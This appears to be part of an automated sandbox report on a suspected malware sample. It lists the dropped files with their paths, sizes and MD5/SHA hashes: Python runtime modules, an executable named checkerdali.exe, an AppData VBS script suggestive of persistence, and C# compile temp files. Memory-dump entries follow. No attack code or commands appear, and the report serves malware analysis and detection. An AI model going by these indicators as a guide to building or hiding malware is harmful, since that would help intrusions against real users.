050a35177b0fcb762934f55969aea64275a5ad66462454e4fa9c5244a7bf884ce4540a9de45e535ba4561deaacb790df01c002b282e94a94b08113bb5d3ac44a

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\_bz2.pyd

Filesize
82KB

MD5
c7ce973f261f698e3db148ccad057c96

SHA1
59809fd48e8597a73211c5df64c7292c5d120a10

SHA256
02d772c03704fe243c8de2672c210a5804d075c1f75e738d6130a173d08dfcde

SHA512
a924750b1825747a622eef93331fd764d824c954297e37e8dc93a450c11aa7ab3ad7c3b823b11656b86e64de3cd5d409fda15db472488dfaa4bb50341f0b29d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\_ctypes.pyd

Filesize
121KB

MD5
10fdcf63d1c3c3b7e5861fbb04d64557

SHA1
1aa153efec4f583643046618b60e495b6e03b3d7

SHA256
bc3b83d2dc9e2f0e6386ed952384c6cf48f6eed51129a50dfd5ef6cbbc0a8fb3

SHA512
dc702f4100ed835e198507cd06fa5389a063d4600fc08be780690d729ab62114fd5e5b201d511b5832c14e90a5975ed574fc96edb5a9ab9eb83f607c7a712c7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\_lzma.pyd

Filesize
155KB

MD5
4e2239ece266230ecb231b306adde070

SHA1
e807a078b71c660db10a27315e761872ffd01443

SHA256
34130d8abe27586ee315262d69af4e27429b7eab1f3131ea375c2bb62cf094be

SHA512
86e6a1eab3529e600dd5caab6103e34b0f618d67322a5ecf1b80839faa028150c492a5cf865a2292cc8584fba008955da81a50b92301583424401d249c5f1401

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\_queue.pyd

Filesize
31KB

MD5
6e00e0821bb519333ccfd4e61a83cb38

SHA1
3550a41bb2ea54f456940c4d1940acab36815949

SHA256
2ad02d49691a629f038f48fcdee46a07c4fcc2cb0620086e7b09ac11915ae6b7

SHA512
c3f8332c10b58f30e292676b48ecf1860c5ef9546367b87e90789f960c91eae4d462dd3ee9cb14f603b9086e81b6701aab56da5b635b22db1e758ed0a983e562

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\_uuid.pyd

Filesize
24KB

MD5
3c8737723a903b08d5d718336900fd8c

SHA1
2ad2d0d50f6b52291e59503222b665b1823b0838

SHA256
bb418e91e543c998d11f9e65fd2a4899b09407ff386e059a88fe2a16aed2556b

SHA512
1d974ec1c96e884f30f4925cc9a03fb5af78687a267dec0d1582b5d7561d251fb733cf733e0cc00faee86f0fef6f73d36a348f3461c6d34b0238a75f69320d10

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\_wmi.pyd

Filesize
35KB

MD5
ee33f4c8d17d17ad62925e85097b0109

SHA1
8c4a03531cf3dbfe6f378fdab9699d51e7888796

SHA256
79adca5037d9145309d3bd19f7a26f7bb7da716ee86e01073c6f2a9681e33dad

SHA512
60b0705a371ad2985db54a91f0e904eea502108663ea3c3fb18ed54671be1932f4f03e8e3fd687a857a5e3500545377b036276c69e821a7d6116b327f5b3d5c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\charset_normalizer\md.pyd

Filesize
10KB

MD5
d9e0217a89d9b9d1d778f7e197e0c191

SHA1
ec692661fcc0b89e0c3bde1773a6168d285b4f0d

SHA256
ecf12e2c0a00c0ed4e2343ea956d78eed55e5a36ba49773633b2dfe7b04335c0

SHA512
3b788ac88c1f2d682c1721c61d223a529697c7e43280686b914467b3b39e7d6debaff4c0e2f42e9dddb28b522f37cb5a3011e91c66d911609c63509f9228133d

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\charset_normalizer\md__mypyc.pyd

Filesize
120KB

MD5
bf9a9da1cf3c98346002648c3eae6dcf

SHA1
db16c09fdc1722631a7a9c465bfe173d94eb5d8b

SHA256
4107b1d6f11d842074a9f21323290bbe97e8eed4aa778fbc348ee09cc4fa4637

SHA512
7371407d12e632fc8fb031393838d36e6a1fe1e978ced36ff750d84e183cde6dd20f75074f4597742c9f8d6f87af12794c589d596a81b920c6c62ee2ba2e5654

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\checkerdali.exe

Filesize
10.2MB

MD5
4500a38912953ac4ab5b5f6e72977939

SHA1
9c5e446f82af0dd0b0d75355df42996e79b0abe1

SHA256
29d7034c8d6af42e7859d5026d3905aa9b28c07b2efe0bc89818c9ad0a3fcc41

SHA512
ffbfaab08d1771ebbda371533de04376dab828553df21e2552d85dfb0668a82f62be310595079ecd10f7e3763acf5a3c20a4d8a6434b36e591276fd4183032ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\libcrypto-3.dll

Filesize
4.9MB

MD5
51e8a5281c2092e45d8c97fbdbf39560

SHA1
c499c810ed83aaadce3b267807e593ec6b121211

SHA256
2a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a

SHA512
98b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\libffi-8.dll

Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\python312.dll

Filesize
6.6MB

MD5
5c5602cda7ab8418420f223366fff5db

SHA1
52f81ee0aef9b6906f7751fd2bbd4953e3f3b798

SHA256
e7890e38256f04ee0b55ac5276bbf3ac61392c3a3ce150bb5497b709803e17ce

SHA512
51c3b4f29781bb52c137ddb356e1bc5a37f3a25f0ed7d89416b14ed994121f884cb3e40ccdbb211a8989e3bd137b8df8b28e232f98de8f35b03965cfce4b424f

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\select.pyd

Filesize
30KB

MD5
bffff83a000baf559f3eb2b599a1b7e8

SHA1
7f9238bda6d0c7cc5399c6b6ab3b42d21053f467

SHA256
bc71fbdfd1441d62dd86d33ff41b35dc3cc34875f625d885c58c8dc000064dab

SHA512
3c0ba0cf356a727066ae0d0d6523440a882aafb3ebdf70117993effd61395deebf179948f8c7f5222d59d1ed748c71d9d53782e16bd2f2eccc296f2f8b4fc948

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\unicodedata.pyd

Filesize
1.1MB

MD5
a1388676824ce6347d31d6c6a7a1d1b5

SHA1
27dd45a5c9b7e61bb894f13193212c6d5668085b

SHA256
2480a78815f619a631210e577e733c9bafecb7f608042e979423c5850ee390ff

SHA512
26ea1b33f14f08bb91027e0d35ac03f6203b4dfeee602bb592c5292ab089b27ff6922da2804a9e8a28e47d4351b32cf93445d894f00b4ad6e2d0c35c6c7f1d89

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\vcruntime140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4644_133768537682799658\zstandard\backend_c.pyd

Filesize
508KB

MD5
0fc69d380fadbd787403e03a1539a24a

SHA1
77f067f6d50f1ec97dfed6fae31a9b801632ef17

SHA256
641e0b0fa75764812fff544c174f7c4838b57f6272eaae246eb7c483a0a35afc

SHA512
e63e200baf817717bdcde53ad664296a448123ffd055d477050b8c7efcab8e4403d525ea3c8181a609c00313f7b390edbb754f0a9278232ade7cfb685270aaf0

Download Submit
C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs

Filesize
3KB

MD5
3d5d0c86438025031b22267d956d6845

SHA1
55adc19e2a366f8ce77a17ccdb6be6437297652f

SHA256
396ee975cdf4f8cd071a15571f0b276ce53fd1f3232ed773131af1ebe6ecd15c

SHA512
5fe420cb13918033d9bf9467a96286d4aa4280f6755f930a4cfff1f1a8b122169361be16fae62a3e8cc7df18ad95c752198b6f4b627648ea08c23200207be053

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lyjr0cys\CSCF57DA6A5D32047B1B5A1AE825CBEF5B.TMP

Filesize
652B

MD5
77299cae6d74264b4b312c11aa1a33bd

SHA1
7dd487e92bff80b5bee51a0bef5aa3d82b74abde

SHA256
814f6b866a7e35eddcca712321ed9473daef3a22cd0af50911ce387d6d4e7fda

SHA512
e04f2e88034f7cc66f4522f980f03198496025425e7378a85e3ac8b5195481a453e90a00175720dbb398b3edce7b668e5dd91b34e5c649a9ea272527a4c736c3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lyjr0cys\lyjr0cys.0.cs

Filesize
8KB

MD5
3ec64336df36ed72f166e00a44a37a50

SHA1
9c23ba44e14b77ffdda10ce77242662cda1332ec

SHA256
4d82960c6086bee4740b780256de103096bbc0ea514d42e0bea60bacde66e556

SHA512
cd36c65128cc4a96c0b19c161e8a32557801c013654c18765a34d53e4d246d238f9426ed5d53fc39b2f9dbde883365b301647cd31c60aa2986086b3a69d92587

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lyjr0cys\lyjr0cys.cmdline

Filesize
369B

MD5
41562948e90454a372f584b50fb0bc56

SHA1
deb71187dd77d31df0aa31d8f0906335043e18f2

SHA256
d9c2c5be8a67b8593f8f3c1975c9994f2f725285fca7e0ac6d45950f845ed8f1

SHA512
684cd63e6fddfda8f9e90b3c29f08b0518ac0fadc0923a733323da207ea33851a4386edd043c971eb52022c98736606137a16756644d9fe29b62ecfd254164f7

Download Submit
memory/116-136-0x0000000006490000-0x000000000649A000-memory.dmp

Filesize
40KB

Download
memory/116-128-0x0000000000400000-0x000000000044E000-memory.dmp

Filesize
312KB

Download
memory/116-129-0x0000000005300000-0x00000000058A4000-memory.dmp

Filesize
5.6MB

Download
memory/116-130-0x0000000004D50000-0x0000000004DE2000-memory.dmp

Filesize
584KB

Download
memory/116-133-0x0000000005CF0000-0x0000000005D02000-memory.dmp

Filesize
72KB

Download
memory/116-134-0x0000000006130000-0x000000000616C000-memory.dmp

Filesize
240KB

Download
memory/1356-82-0x000002666A590000-0x000002666A5B2000-memory.dmp

Filesize
136KB

Download
memory/1812-97-0x0000000005520000-0x0000000005586000-memory.dmp

Filesize
408KB

Download
memory/1812-92-0x0000000002E50000-0x0000000002E86000-memory.dmp

Filesize
216KB

Download
memory/1812-96-0x0000000005460000-0x0000000005482000-memory.dmp

Filesize
136KB

Download
memory/1812-126-0x0000000006A10000-0x0000000006A18000-memory.dmp

Filesize
32KB

Download
memory/1812-98-0x0000000005CD0000-0x0000000005D36000-memory.dmp

Filesize
408KB

Download
memory/1812-108-0x0000000005E40000-0x0000000006194000-memory.dmp

Filesize
3.3MB

Download
memory/1812-94-0x0000000005590000-0x0000000005BB8000-memory.dmp

Filesize
6.2MB

Download
memory/1812-110-0x0000000006450000-0x000000000646E000-memory.dmp

Filesize
120KB

Download
memory/1812-111-0x00000000064F0000-0x000000000653C000-memory.dmp

Filesize
304KB

Download
memory/1812-113-0x0000000006970000-0x000000000698A000-memory.dmp

Filesize
104KB

Download
memory/1812-112-0x0000000007CA0000-0x000000000831A000-memory.dmp

Filesize
6.5MB

Download
memory/4644-7-0x00007FFC12A40000-0x00007FFC12A42000-memory.dmp

Filesize
8KB

Download
memory/4644-6-0x00007FFC13990000-0x00007FFC13992000-memory.dmp

Filesize
8KB

Download
memory/4644-2-0x00007FFC14E20000-0x00007FFC14E22000-memory.dmp

Filesize
8KB

Download
memory/4644-3-0x00007FFC14E30000-0x00007FFC14E32000-memory.dmp

Filesize
8KB

Download
memory/4644-78-0x00007FF6E03B0000-0x00007FF6E2C14000-memory.dmp

Filesize
40.4MB

Download
memory/4644-4-0x00007FFC14E40000-0x00007FFC14E42000-memory.dmp

Filesize
8KB

Download
memory/4644-0-0x00007FF6E0407000-0x00007FF6E14F6000-memory.dmp

Filesize
16.9MB

Download
memory/4644-1-0x00007FFC14E10000-0x00007FFC14E12000-memory.dmp

Filesize
8KB

Download
memory/4644-5-0x00007FFC13980000-0x00007FFC13982000-memory.dmp

Filesize
8KB

Download
memory/4644-131-0x00007FF6E0407000-0x00007FF6E14F6000-memory.dmp

Filesize
16.9MB

Download
memory/4644-132-0x00007FF6E03B0000-0x00007FF6E2C14000-memory.dmp

Filesize
40.4MB

Download
memory/4644-8-0x00007FFC12A50000-0x00007FFC12A52000-memory.dmp

Filesize
8KB

Download
memory/4644-12-0x00007FF6E03B0000-0x00007FF6E2C14000-memory.dmp

Filesize
40.4MB

Download
memory/4644-9-0x00007FF6E03B0000-0x00007FF6E2C14000-memory.dmp

Filesize
40.4MB

Download